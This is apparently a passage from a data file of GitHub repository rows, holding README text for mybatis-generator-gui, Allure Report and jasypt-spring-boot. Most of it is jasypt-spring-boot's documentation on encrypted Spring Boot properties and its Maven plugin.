-  git clone https://github.com/zouzg/mybatis-generator-gui
-  cd mybatis-generator-gui
-  mvn jfx:jar
-  cd target/jfx/app/
-  java -jar mybatis-generator-gui.jar
-  ```
-
-* Option 3: run from an IDE
-
-  Start it from Eclipse or IntelliJ IDEA: find the `com.zzg.mybatis.generator.MainUI` class and run it (just make sure the JDK your IDE runs with meets the requirements above)
-
-* Option 4: package it as a native application, then launch it from a shortcut with a double click
-
-  If you do not want the installer to use Java's grey coffee-cup logo, uncomment the icon configuration for your platform in the pom file
-
-  ```bash
-  #${project.basedir}/package/windows/mybatis-generator-gui.ico is for Windows
-  #${project.basedir}/package/macosx/mybatis-generator-gui.icns is for macOS
-  mvn jfx:native
-  ```
-
-  Also note that packaging an exe on Windows requires WiX Toolset 3+; since the JRE is bundled into the installer, both platforms come to roughly 100 MB, so please build the package yourself; the resulting installer is under target/jfx/native
-
-### Notes
-* This code generator is only suitable for single-table CRUD; for queries joining multiple tables, please write new XML and Mapper files yourself;
-* On some systems the input fields cannot accept text while a Chinese input method is active; please switch to an English input method;
-* If you are unsure what a field or option means, hover the cursor over the field or its label for a moment and an explanation will appear if one exists;
-
-
-### Documentation
-For more detailed documentation, see this repository's Wiki
-* [Usage](https://github.com/astarring/mybatis-generator-gui/wiki/Usage-Guide)
-
-
-### Contributing
-This tool is open-sourced because it proved very useful in my own projects. If you find it useful and want to improve it, you can:
-* Propose features you consider useful in an Issue, and I will try to implement them
-* For bugs, please file an Issue that includes
-  * How to reproduce the bug, including your operating system, JDK version, and database type and version
-  * Screenshots of any errors, if available
-  * For common problems such as database connection failures or the application not starting, please read the documentation above carefully first; if that does not help, ask in the group below (provide as much information as possible when asking, otherwise nobody will be willing to help you based on a few lines of text).
-
-### QQ group
-Since some users may be unable to use QQ for special reasons, I have created a DingTalk group for discussion. DingTalk group number: 35412531 (the original QQ group is no longer provided, as QQ is inconvenient to open)
-
-- - -
-
-Licensed under the Apache 2.0 License
-
-Copyright 2017 by Owen Zou
-",0
-allure-framework/allure2,"Allure Report is a flexible, lightweight multi-language test reporting tool. 
It provides clear graphical reports and allows everyone involved in the development process to extract the maximum of information from the everyday testing process",2016-05-27T14:06:05Z,,"[license]: http://www.apache.org/licenses/LICENSE-2.0 ""Apache License 2.0"" -[site]: https://allurereport.org/?source=github_allure2 ""Official Website"" -[docs]: https://allurereport.org/docs/?source=github_allure2 ""Documentation"" -[qametaio]: https://qameta.io/?source=Report_GitHub ""Qameta Software"" -[blog]: https://qameta.io/blog ""Qameta Software Blog"" -[Twitter]: https://twitter.com/QametaSoftware ""Qameta Software"" -[twitter-team]: https://twitter.com/QametaSoftware/lists/team/members ""Team"" -[build]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml -[build-badge]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml/badge.svg -[maven]: https://repo.maven.apache.org/maven2/io/qameta/allure/allure-commandline/ ""Maven Central"" -[maven-badge]: https://img.shields.io/maven-central/v/io.qameta.allure/allure-commandline.svg?style=flat -[release]: https://github.com/allure-framework/allure2/releases/latest ""Latest release"" -[release-badge]: https://img.shields.io/github/release/allure-framework/allure2.svg?style=flat -[CONTRIBUTING.md]: .github/CONTRIBUTING.md -[CODE_OF_CONDUCT.md]: CODE_OF_CONDUCT.md - -# Allure Report - -[![build-badge][]][build] [![release-badge][]][release] [![maven-badge][]][maven] [![Backers on Open Collective](https://opencollective.com/allure-report/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/allure-report/sponsors/badge.svg)](#sponsors) - -> Allure Report is a flexible multi-language test report tool to show you a detailed representation of what has been tested and extract maximum from the everyday execution of tests. 
- - - -- Learn more about Allure Report at [https://allurereport.org](https://allurereport.org) -- 📚 [Documentation](https://allurereport.org/docs/) – discover official documentation for Allure Report -- ❓ [Questions and Support](https://github.com/orgs/allure-framework/discussions/categories/questions-support) – get help from the team and community -- 📢 [Official announcements](https://github.com/orgs/allure-framework/discussions/categories/announcements) – stay updated with our latest news and updates -- 💬 [General Discussion](https://github.com/orgs/allure-framework/discussions/categories/general-discussion) – engage in casual conversations, share insights and ideas with the community -- 🖥️ [Live Demo](https://demo.allurereport.org/) — explore a live example of Allure Report in action - ---- - -## Download - -You can use one of the following ways to get Allure: - -* Grab it from [releases](https://github.com/allure-framework/allure2/releases) (see Assets section). -* Using Homebrew: - - ```bash - $ brew install allure - ``` -* For Windows, Allure is available from the [Scoop](http://scoop.sh/) commandline-installer. -To install Allure, download and install Scoop and then execute in the Powershell: - - ```bash - scoop install allure - ``` -## How Allure Report works - -Allure Report can build unified reports for dozens of testing tools across eleven programming languages on several CI/CD systems. - -![How Allure Report works](.github/how_allure_works.jpg) - -## Allure TestOps - -[DevOps-ready Testing Platform built][qametaio] to reduce code time-to-market without quality loss. You can set up your product quality control and boost your QA and development team productivity by setting up your TestOps. - -## Contributors - -This project exists thanks to all the people who contributed. [[Contribute]](.github/CONTRIBUTING.md). 
- - -",0 -ulisesbocchio/jasypt-spring-boot,Jasypt integration for Spring boot,2015-05-27T14:00:55Z,,"# jasypt-spring-boot -**[Jasypt](http://www.jasypt.org)** integration for Spring boot 2.x and 3.0.0 - -[![Build Status](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot.svg?branch=master)](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot) -[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ulisesbocchio/jasypt-spring-boot?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) -[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot) - - -[![Code Climate](https://codeclimate.com/github/rsercano/mongoclient/badges/gpa.svg)](https://codeclimate.com/github/ulisesbocchio/jasypt-spring-boot) -[![Codacy Badge](https://api.codacy.com/project/badge/Grade/6a75fc4e1d3f480f811b5339202400b5)](https://www.codacy.com/app/ulisesbocchio/jasypt-spring-boot?utm_source=github.com&utm_medium=referral&utm_content=ulisesbocchio/jasypt-spring-boot&utm_campaign=Badge_Grade) -[![GitHub release](https://img.shields.io/github/release/ulisesbocchio/jasypt-spring-boot.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot) -[![Github All Releases](https://img.shields.io/github/downloads/ulisesbocchio/jasypt-spring-boot/total.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot) -[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://github.com/ulisesbocchio/jasypt-spring-boot/blob/master/LICENSE) -[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/ulisesbocchio/jasypt-spring-boot) - -[![Paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9J2V5HJT8AZF8) - -[![""Buy Me A 
Coffee""](https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png)](https://www.buymeacoffee.com/ulisesbd) - -Jasypt Spring Boot provides Encryption support for property sources in Spring Boot Applications.
-There are 3 ways to integrate `jasypt-spring-boot` in your project: - -- Simply adding the starter jar `jasypt-spring-boot-starter` to your classpath if using `@SpringBootApplication` or `@EnableAutoConfiguration` will enable encryptable properties across the entire Spring Environment -- Adding `jasypt-spring-boot` to your classpath and adding `@EnableEncryptableProperties` to your main Configuration class to enable encryptable properties across the entire Spring Environment -- Adding `jasypt-spring-boot` to your classpath and declaring individual encryptable property sources with `@EncrytablePropertySource` -## What's new? -### Go to [Releases](https://github.com/ulisesbocchio/jasypt-spring-boot/releases) -## What to do First? -Use one of the following 3 methods (briefly explained above): - -1. Simply add the starter jar dependency to your project if your Spring Boot application uses `@SpringBootApplication` or `@EnableAutoConfiguration` and encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, application-*.properties, yaml properties, and any other property sources can contain encrypted properties): - - ```xml - - com.github.ulisesbocchio - jasypt-spring-boot-starter - 3.0.5 - - ``` -2. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations then add this dependency to your project: - - ```xml - - com.github.ulisesbocchio - jasypt-spring-boot - 3.0.5 - - ``` - - And then add `@EnableEncryptableProperties` to you Configuration class. For instance: - - ```java - @Configuration - @EnableEncryptableProperties - public class MyApplication { - ... 
- } - ``` - And encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, yaml properties, and any other custom property sources can contain encrypted properties) - -3. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations and you don't want to enable encryptable properties across the entire Spring Environment, there's a third option. First add the following dependency to your project: - - ```xml - - com.github.ulisesbocchio - jasypt-spring-boot - 3.0.5 - - ``` - And then add as many `@EncryptablePropertySource` annotations as you want in your Configuration files. Just like you do with Spring's `@PropertySource` annotation. For instance: - - ```java - @Configuration - @EncryptablePropertySource(name = ""EncryptedProperties"", value = ""classpath:encrypted.properties"") - public class MyApplication { - ... - } - ``` -Conveniently, there's also a `@EncryptablePropertySources` annotation that one could use to group annotations of type `@EncryptablePropertySource` like this: - -```java - @Configuration - @EncryptablePropertySources({@EncryptablePropertySource(""classpath:encrypted.properties""), - @EncryptablePropertySource(""classpath:encrypted2.properties"")}) - public class MyApplication { - ... - } -``` - -Also, note that as of version 1.8, `@EncryptablePropertySource` supports YAML files - -## Custom Environment -As of version ~~1.7~~ 1.15, a 4th method of enabling encryptable properties exists for some special cases. 
A custom `ConfigurableEnvironment` class is provided: ~~`EncryptableEnvironment`~~ `StandardEncryptableEnvironment` and `StandardEncryptableServletEnvironment` that can be used with `SpringApplicationBuilder` to define the custom environment this way: - -```java -new SpringApplicationBuilder() - .environment(new StandardEncryptableEnvironment()) - .sources(YourApplicationClass.class).run(args); - -``` - -This method would only require using a dependency for `jasypt-spring-boot`. No starter jar dependency is required. This method is useful for early access of encrypted properties on bootstrap. While not required in most scenarios could be useful when customizing Spring Boot's init behavior or integrating with certain capabilities that are configured very early, such as Logging configuration. For a concrete example, this method of enabling encryptable properties is the only one that works with Spring Properties replacement in `logback-spring.xml` files, using the `springProperty` tag. For instance: - -```xml - - - - - org.postgresql.Driver - jdbc:postgresql://localhost:5432/simple - ${user} - ${password} - - -``` - -This mechanism could be used for instance (as shown) to initialize Database Logging Appender that require sensitive credentials to be passed. -Alternatively, if a custom `StringEncryptor` is needed to be provided, a static builder method is provided `StandardEncryptableEnvironment#builder` for customization (other customizations are possible): - -```java -StandardEncryptableEnvironment - .builder() - .encryptor(new MyEncryptor()) - .build() -``` - -## How everything Works? - -This will trigger some configuration to be loaded that basically does 2 things: - -1. It registers a Spring post processor that decorates all PropertySource objects contained in the Spring Environment so they are ""encryption aware"" and detect when properties are encrypted following jasypt's property convention. -2. 
It defines a default `StringEncryptor` that can be configured through regular properties, system properties, or command line arguments.
-
-## Where do I put my encrypted properties?
-When using METHODS 1 and 2 you can define encrypted properties in any of the PropertySources contained in the Environment. For instance, using the `@PropertySource` annotation:
-
-```java
-    @SpringBootApplication
-    @EnableEncryptableProperties
-    @PropertySource(name=""EncryptedProperties"", value = ""classpath:encrypted.properties"")
-    public class MyApplication {
-        ...
-    }
-```
-And your encrypted.properties file would look something like this:
-
-```properties
-    secret.property=ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+)
-```
-Now when you do `environment.getProperty(""secret.property"")` or use `@Value(""${secret.property}"")` what you get is the decrypted version of `secret.property`.
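The `ENC(...)` convention shown above can be illustrated with a small, self-contained sketch. This is not the library's actual implementation (the real work is done by its `EncryptablePropertyDetector` and `StringEncryptor`); it only mirrors the default detect-and-unwrap behavior, and the class name `EncConventionSketch` is an arbitrary choice for the example:

```java
// Sketch of the default property convention: values wrapped in ENC(...) are
// treated as encrypted, and the wrapper is stripped to obtain the payload
// that would then be handed to the StringEncryptor for decryption.
class EncConventionSketch {
    static final String PREFIX = "ENC(";
    static final String SUFFIX = ")";

    static boolean isEncrypted(String value) {
        return value != null && value.startsWith(PREFIX) && value.endsWith(SUFFIX);
    }

    static String unwrap(String value) {
        // Strip ENC( and the trailing ) to recover the encrypted payload.
        return value.substring(PREFIX.length(), value.length() - SUFFIX.length());
    }

    public static void main(String[] args) {
        String raw = "ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+)";
        System.out.println(isEncrypted(raw));
        System.out.println(unwrap(raw));
    }
}
```

Anything that does not match the wrapper, such as `regular.property=example`, is simply passed through untouched.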
-When using METHOD 3 (`@EncryptablePropertySource`) then you can access the encrypted properties the same way, the only difference is that you must put the properties in the resource that was declared within the `@EncryptablePropertySource` annotation so that the properties can be decrypted properly. - -## Password-based Encryption Configuration -Jasypt uses an `StringEncryptor` to decrypt properties. For all 3 methods, if no custom `StringEncryptor` (see the [Custom Encryptor](#customEncryptor) section for details) is found in the Spring Context, one is created automatically that can be configured through the following properties (System, properties file, command line arguments, environment variable, etc.): - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
KeyRequiredDefault Value
jasypt.encryptor.passwordTrue -
jasypt.encryptor.algorithmFalsePBEWITHHMACSHA512ANDAES_256
jasypt.encryptor.key-obtention-iterationsFalse1000
jasypt.encryptor.pool-sizeFalse1
jasypt.encryptor.provider-nameFalseSunJCE
jasypt.encryptor.provider-class-nameFalsenull
jasypt.encryptor.salt-generator-classnameFalseorg.jasypt.salt.RandomSaltGenerator
jasypt.encryptor.iv-generator-classnameFalseorg.jasypt.iv.RandomIvGenerator
jasypt.encryptor.string-output-typeFalsebase64
jasypt.encryptor.proxy-property-sourcesFalsefalse
jasypt.encryptor.skip-property-sourcesFalseempty list
- -The only property required is the encryption password, the rest could be left to use default values. While all this properties could be declared in a properties file, the encryptor password should not be stored in a property file, it should rather be passed as system property, command line argument, or environment variable and as far as its name is `jasypt.encryptor.password` it'll work.
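The advice above can be made concrete with a minimal, hypothetical sketch (not part of `jasypt-spring-boot` itself): resolve the encryptor password from the `jasypt.encryptor.password` system property first, falling back to an environment variable. `JASYPT_ENCRYPTOR_PASSWORD` is assumed here as the relaxed-binding name Spring Boot would map to the same property:

```java
// Hypothetical helper illustrating the recommended channels for supplying the
// encryptor password without storing it in a properties file: a system
// property (e.g. -Djasypt.encryptor.password=...) or an environment variable.
class EncryptorPasswordLookup {

    static String lookupPassword() {
        // A -D system property (or a command line argument mapped to one)
        // takes precedence in this sketch.
        String fromSystem = System.getProperty("jasypt.encryptor.password");
        if (fromSystem != null) {
            return fromSystem;
        }
        // Fall back to the environment variable form.
        return System.getenv("JASYPT_ENCRYPTOR_PASSWORD");
    }

    public static void main(String[] args) {
        // Simulate launching with -Djasypt.encryptor.password=demo-password
        System.setProperty("jasypt.encryptor.password", "demo-password");
        System.out.println(lookupPassword());
    }
}
```

Either way, no sensitive value needs to be committed alongside the encrypted properties themselves.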
-
-The last property, `jasypt.encryptor.proxyPropertySources`, is used to indicate to `jasypt-spring-boot` how property values are going to be intercepted for decryption. The default value, `false`, uses custom wrapper implementations of `PropertySource`, `EnumerablePropertySource`, and `MapPropertySource`. When `true` is specified for this property, the interception mechanism will use CGLib proxies on each specific `PropertySource` implementation. This may be useful in some scenarios where the type of the original `PropertySource` must be preserved.
-
-## Use your own Custom Encryptor
-For custom configuration of the encryptor and the source of the encryptor password you can always define your own `StringEncryptor` bean in your Spring Context, and the default encryptor will be ignored. For instance:
-
-```java
-    @Bean(""jasyptStringEncryptor"")
-    public StringEncryptor stringEncryptor() {
-        PooledPBEStringEncryptor encryptor = new PooledPBEStringEncryptor();
-        SimpleStringPBEConfig config = new SimpleStringPBEConfig();
-        config.setPassword(""password"");
-        config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256"");
-        config.setKeyObtentionIterations(""1000"");
-        config.setPoolSize(""1"");
-        config.setProviderName(""SunJCE"");
-        config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator"");
-        config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator"");
-        config.setStringOutputType(""base64"");
-        encryptor.setConfig(config);
-        return encryptor;
-    }
-```
-Notice that the bean name is required, as `jasypt-spring-boot` detects custom String Encryptors by name as of version `1.5`. The default bean name is:
-
-``` jasyptStringEncryptor ```
-
-But one can also override this by defining the property:
-
-``` jasypt.encryptor.bean ```
-
-So for instance, if you define `jasypt.encryptor.bean=encryptorBean` then you would define your custom encryptor with that name:
-
-```java
-    @Bean(""encryptorBean"")
-    public StringEncryptor stringEncryptor() {
-        ...
-    }
-```
-
-## Custom Property Detector, Prefix, Suffix and/or Resolver
-
-As of `jasypt-spring-boot-1.10` there are new extension points. `EncryptablePropertySource` now uses `EncryptablePropertyResolver` to resolve all properties:
-
-```java
-public interface EncryptablePropertyResolver {
-    String resolvePropertyValue(String value);
-}
-```
-
-Implementations of this interface are responsible for both **detecting** and **decrypting** properties. The default implementation, `DefaultPropertyResolver`, uses the aforementioned
-`StringEncryptor` and a new `EncryptablePropertyDetector`.
-
-### Provide a Custom `EncryptablePropertyDetector`
-
-You can override the default implementation by providing a Bean of type `EncryptablePropertyDetector` with the name `encryptablePropertyDetector`, or, if you want to provide
-your own bean name, override the property `jasypt.encryptor.property.detector-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for
-detecting encrypted properties.
-Example:
-
-```java
-private static class MyEncryptablePropertyDetector implements EncryptablePropertyDetector {
-    @Override
-    public boolean isEncrypted(String value) {
-        if (value != null) {
-            return value.startsWith(""ENC@"");
-        }
-        return false;
-    }
-
-    @Override
-    public String unwrapEncryptedValue(String value) {
-        return value.substring(""ENC@"".length());
-    }
-}
-```
-
-```java
-@Bean(name = ""encryptablePropertyDetector"")
-public EncryptablePropertyDetector encryptablePropertyDetector() {
-    return new MyEncryptablePropertyDetector();
-}
-```
-
-### Provide a Custom Encrypted Property `prefix` and `suffix`
-
-If all you want to do is have a different prefix/suffix for encrypted properties, you can keep using all the default implementations
-and just override the following properties in `application.properties` (or `application.yml`):
-
-```YAML
-jasypt:
-  encryptor:
-    property:
-      prefix: ""ENC@[""
-      suffix: ""]""
-```
-
-### Provide a Custom `EncryptablePropertyResolver`
-
-You can override the default implementation by providing a Bean of type `EncryptablePropertyResolver` with the name `encryptablePropertyResolver`, or, if you want to provide
-your own bean name, override the property `jasypt.encryptor.property.resolver-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for
-detecting and decrypting encrypted properties.
-Example: - -```java - class MyEncryptablePropertyResolver implements EncryptablePropertyResolver { - - - private final PooledPBEStringEncryptor encryptor; - - public MyEncryptablePropertyResolver(char[] password) { - this.encryptor = new PooledPBEStringEncryptor(); - SimpleStringPBEConfig config = new SimpleStringPBEConfig(); - config.setPasswordCharArray(password); - config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256""); - config.setKeyObtentionIterations(""1000""); - config.setPoolSize(1); - config.setProviderName(""SunJCE""); - config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator""); - config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator""); - config.setStringOutputType(""base64""); - encryptor.setConfig(config); - } - - @Override - public String resolvePropertyValue(String value) { - if (value != null && value.startsWith(""{cipher}"")) { - return encryptor.decrypt(value.substring(""{cipher}"".length())); - } - return value; - } - } -``` - -```java -@Bean(name=""encryptablePropertyResolver"") - EncryptablePropertyResolver encryptablePropertyResolver(@Value(""${jasypt.encryptor.password}"") String password) { - return new MyEncryptablePropertyResolver(password.toCharArray()); - } -``` - -Notice that by overriding `EncryptablePropertyResolver`, any other configuration or overrides you may have for prefixes, suffixes, -`EncryptablePropertyDetector` and `StringEncryptor` will stop working since the Default resolver is what uses them. You'd have to -wire all that stuff yourself. Fortunately, you don't have to override this bean in most cases, the previous options should suffice. - -But as you can see in the implementation, the detection and decryption of the encrypted properties are internal to `MyEncryptablePropertyResolver` - -## Using Filters - -`jasypt-spring-boot:2.1.0` introduces a new feature to specify property filters. 
The filter is part of the `EncryptablePropertyResolver` API
-and allows you to determine which properties or property sources should be considered for decryption. That is, the filter runs before the actual
-property value is even examined in search of an encrypted payload to decrypt. For instance, by default, all properties whose names start with `jasypt.encryptor`
-are excluded from examination. This avoids circular dependencies at load time when the library beans are configured.
-
-### DefaultPropertyFilter properties
-
-By default, the `DefaultPropertyResolver` uses `DefaultPropertyFilter`, which allows you to specify the following string pattern lists:
-
-* jasypt.encryptor.property.filter.include-sources: Specify the property source name patterns to be included for decryption
-* jasypt.encryptor.property.filter.exclude-sources: Specify the property source name patterns to be EXCLUDED for decryption
-* jasypt.encryptor.property.filter.include-names: Specify the property name patterns to be included for decryption
-* jasypt.encryptor.property.filter.exclude-names: Specify the property name patterns to be EXCLUDED for decryption
-
-### Provide a custom `EncryptablePropertyFilter`
-
-You can override the default implementation by providing a Bean of type `EncryptablePropertyFilter` with the name `encryptablePropertyFilter`, or, if you want to provide
-your own bean name, override the property `jasypt.encryptor.property.filter-bean` and specify the name you want to give the bean. When providing this, you'll be responsible for
-detecting the properties and/or property sources you want to consider for decryption.
-Example:
-
-```java
-class MyEncryptablePropertyFilter implements EncryptablePropertyFilter {
-
-    public boolean shouldInclude(PropertySource<?> source, String name) {
-        return name.startsWith(""encrypted."");
-    }
-}
-```
-
-```java
-@Bean(name = ""encryptablePropertyFilter"")
-EncryptablePropertyFilter encryptablePropertyFilter() {
-    return new MyEncryptablePropertyFilter();
-}
-```
-
-Notice that for this mechanism to work, you should not provide a custom `EncryptablePropertyResolver`; use the default
-resolver instead. If you provide a custom resolver, you are responsible for the entire process of detecting and decrypting
-properties.
-
-## Filter out `PropertySource` classes from being introspected
-Define a comma-separated list of fully-qualified class names to be skipped from introspection. These classes will not be
-wrapped/proxied by this plugin, and thereby properties contained in them won't support encryption/decryption:
-
-```properties
-jasypt.encryptor.skip-property-sources=org.springframework.boot.env.RandomValuePropertySource,org.springframework.boot.ansi.AnsiPropertySource
-```
-## Encryptable Properties cache refresh
-Encrypted properties are cached within your application, and in certain scenarios, such as when using externalized configuration
-from a config server, the properties need to be refreshed when they change.
For this `jasypt-spring-boot` registers a -`RefreshScopeRefreshedEventListener` that listens to the following events by default to clear the encrypted properties cache: -```java -public static final List EVENT_CLASS_NAMES = Arrays.asList( - ""org.springframework.cloud.context.scope.refresh.RefreshScopeRefreshedEvent"", - ""org.springframework.cloud.context.environment.EnvironmentChangeEvent"", - ""org.springframework.boot.web.servlet.context.ServletWebServerInitializedEvent"" - ); -``` -Should you need to register extra events that you would like to trigger an encrypted cache invalidation you can add them -using the following property (separate by comma if more than one needed): -```properties -jasypt.encryptor.refreshed-event-classes=org.springframework.boot.context.event.ApplicationStartedEvent -``` - -## Maven Plugin - -A Maven plugin is provided with a number of helpful utilities. - -To use the plugin, just add the following to your pom.xml: - -```xml - - - - com.github.ulisesbocchio - jasypt-maven-plugin - 3.0.5 - - - -``` - -When using this plugin, the easiest way to provide your encryption password is via a system property i.e. --Djasypt.encryptor.password=""the password"". - -By default, the plugin will consider encryption configuration in standard Spring boot configuration files under -./src/main/resources. You can also use system properties or environment variables to supply this configuration. - -Keep in mind that the rest of your application code and resources are not available to the plugin because Maven plugins -do not share a classpath with projects. If your application provides encryption configuration via a StringEncryptor -bean then this will not be picked up. - -In general, it is recommended to just rely on the secure default configuration. 
- -### Encryption - -To encrypt a single value run: - -```bash -mvn jasypt:encrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""theValueYouWantToEncrypt"" -``` - -To encrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `DEC(...)`. -For example: - -```properties -sensitive.password=DEC(secret value) -regular.property=example -``` - -Then run: - -```bash -mvn jasypt:encrypt -Djasypt.encryptor.password=""the password"" -``` - -Which would edit that file in place resulting in: - -```properties -sensitive.password=ENC(encrypted) -regular.property=example -``` - -The file name and location can be customised. - -### Decryption - -To decrypt a single value run: - -```bash -mvn jasypt:decrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""DbG1GppXOsFa2G69PnmADvQFI3esceEhJYbaEIKCcEO5C85JEqGAhfcjFMGnoRFf"" -``` - -To decrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `ENC(...)`. For -example: - -```properties -sensitive.password=ENC(encrypted) -regular.property=example -``` - -This can be decrypted as follows: - -```bash -mvn jasypt:decrypt -Djasypt.encryptor.password=""the password"" -``` - -Which would output the decrypted contents to the screen: - -```properties -sensitive.password=DEC(decrypted) -regular.property=example -``` - -Note that outputting to the screen, rather than editing the file in place, is designed to reduce -accidental committing of decrypted values to version control. When decrypting, you most likely -just want to check what value has been encrypted, rather than wanting to permanently decrypt that -value. - -### Re-encryption -Changing the configuration for existing encrypted properties is slightly awkward using the encrypt/decrypt goals. 
You must run the decrypt goal using the old configuration, then copy the decrypted output back into the original file, then
run the encrypt goal with the new configuration.

The re-encrypt goal simplifies this by re-encrypting a file in place. Two sets of configuration must be provided. The
new configuration is supplied in the same way as you would configure the other maven goals. The old configuration
is supplied via system properties prefixed with `jasypt.plugin.old` instead of `jasypt.encryptor`.

For example, to re-encrypt application.properties that was previously encrypted with the password OLD and then
encrypt with the new password NEW:

```bash
mvn jasypt:reencrypt -Djasypt.plugin.old.password=OLD -Djasypt.encryptor.password=NEW
```

*Note: All old configuration must be passed as system properties. Environment variables and Spring Boot configuration
files are not supported.*

### Upgrade
Sometimes the default encryption configuration might change between versions of jasypt-spring-boot. You can
automatically upgrade your encrypted properties to the new defaults with the upgrade goal. This will decrypt your
application.properties file using the old default configuration and re-encrypt it using the new default configuration.

```bash
mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE
```

You can also pass the system property `-Djasypt.plugin.old.major-version` to specify the version you are upgrading from.
This will always default to the last major version where the configuration changed. Currently, the only major version
where the defaults changed is version 2, so there is no need to set this property, but it is there for future use.

### Load
You can also decrypt a properties file and load all of its properties into memory, making them accessible to Maven. This is useful when you want to make encrypted properties available to other Maven plugins.

You can chain the goals of later plugins directly after this one.
For example, with flyway:

```bash
mvn jasypt:load flyway:migrate -Djasypt.encryptor.password="the password"
```

You can also specify a prefix for each property with `-Djasypt.plugin.keyPrefix=example.`. This
helps to avoid potential clashes with other Maven properties.

### Changing the file path

For all the above utilities, the path of the file you are encrypting/decrypting defaults to
`file:src/main/resources/application.properties`.

This can be changed using the `-Djasypt.plugin.path` system property.

You can encrypt a file in your test resources directory:

```bash
mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/test/application.properties" -Djasypt.encryptor.password="the password"
```

Or with a different name:

```bash
mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/resources/flyway.properties" -Djasypt.encryptor.password="the password"
```

Or with a different file type (the plugin supports any plain text file format, including YAML):

```bash
mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/resources/application.yaml" -Djasypt.encryptor.password="the password"
```

**Note that the load goal only supports .property files**

### Spring profiles and other spring config

You can override any Spring configuration your application supports when running the plugin, for instance to select a given spring profile:

```bash
mvn jasypt:encrypt -Dspring.profiles.active=cloud -Djasypt.encryptor.password="the password"
```

### Multi-module maven projects

To encrypt/decrypt properties in multi-module projects, disable recursion with `-N` or `--non-recursive` on the maven command:

```bash
mvn jasypt:upgrade -Djasypt.plugin.path=file:server/src/test/resources/application-test.properties -Djasypt.encryptor.password=supersecret -N
```

## Asymmetric Encryption

`jasypt-spring-boot:2.1.1` introduces a new feature to encrypt/decrypt properties using asymmetric encryption with a pair of
private/public keys
in DER or PEM formats.

### Config Properties

The following are the configuration properties you can use to configure asymmetric decryption of properties:

| Key                                   | Default Value | Description                                                          |
|---------------------------------------|---------------|----------------------------------------------------------------------|
| `jasypt.encryptor.privateKeyString`   | null          | private key for decryption in String format                          |
| `jasypt.encryptor.privateKeyLocation` | null          | location of the private key for decryption in spring resource format |
| `jasypt.encryptor.privateKeyFormat`   | DER           | key format: `DER` or `PEM`                                           |
- - You should either use `privateKeyString` or `privateKeyLocation`, the String format takes precedence if set. - To specify a private key in DER format with `privateKeyString`, please encode the key bytes to `base64`. - - __Note__ that `jasypt.encryptor.password` still takes precedences for PBE encryption over the asymmetric config. - -### Sample config - -#### DER key as string -```yaml -jasypt: - encryptor: - privateKeyString: 